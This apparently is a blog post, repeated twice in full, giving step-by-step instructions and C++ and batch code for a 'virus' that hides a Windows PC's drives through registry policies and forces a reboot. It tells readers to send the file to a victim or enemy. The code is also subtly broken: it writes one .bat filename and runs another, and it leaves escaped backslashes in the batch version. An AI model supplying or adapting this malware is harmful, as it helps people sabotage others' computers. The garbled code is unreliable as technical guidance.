There is Trick to make a Virus which can Disable Full Hard Disk. This is a Virus made out of C++ Code. This Trick can be used to Hack any Computer's Hard Disk and annoy the Friends or Enemy.
Note : Don't Run this Program on your Computer otherwise you will lose your Windows. I am not Responsible for any Accident caused by this File on your Computer.
Here is a Trick to make a Virus which can Disable Full Hard Disk.
1) Open Notepad.
2) Copy and Paste the following Code into Notepad :
#include<windows.h>
#include<fstream.h>
#include<iostream.h>
#include<string.h>
#include<conio.h>
int main()
{ofstream write ( "C:\\WINDOWS\\system32\\HackDrive.bat" );
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry your Computer is Hacked by Me!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }
2) Save it as HardDiskHack.cpp.
3) Compile this File in C++ and Create the .exe ( HardDiskHack.exe ) File.
Note : Don't Run so Created HardDiskHack.exe File, it will attack your Computer itself.
4) Send this File to the Victim or the Enemy.
5) If someone is not a Good C++ Programmer, he / she can also create the Bat Virus. To create it follow these simple steps :
a) Open Notepad.
b) Copy and Paste the following Code into Notepad :
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \"Sorry your Computer is Hacked by Me!\" -f
c) Save it as HardDiskHack.bat.
d) Now it is done.
Soit is a simple Trick to make a Virus which can Disable Full Hard Disk.
Note : Don't Run this Program on your Computer otherwise you will lose your Windows. I am not Responsible for any Accident caused by this File on your Computer.
Here is a Trick to make a Virus which can Disable Full Hard Disk.
1) Open Notepad.
2) Copy and Paste the following Code into Notepad :
#include<windows.h>
#include<fstream.h>
#include<iostream.h>
#include<string.h>
#include<conio.h>
int main()
{ofstream write ( "C:\\WINDOWS\\system32\\HackDrive.bat" );
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry your Computer is Hacked by Me!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }
2) Save it as HardDiskHack.cpp.
3) Compile this File in C++ and Create the .exe ( HardDiskHack.exe ) File.
Note : Don't Run so Created HardDiskHack.exe File, it will attack your Computer itself.
4) Send this File to the Victim or the Enemy.
5) If someone is not a Good C++ Programmer, he / she can also create the Bat Virus. To create it follow these simple steps :
a) Open Notepad.
b) Copy and Paste the following Code into Notepad :
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \"Sorry your Computer is Hacked by Me!\" -f
c) Save it as HardDiskHack.bat.
d) Now it is done.
Soit is a simple Trick to make a Virus which can Disable Full Hard Disk.
0 comments:
Post a Comment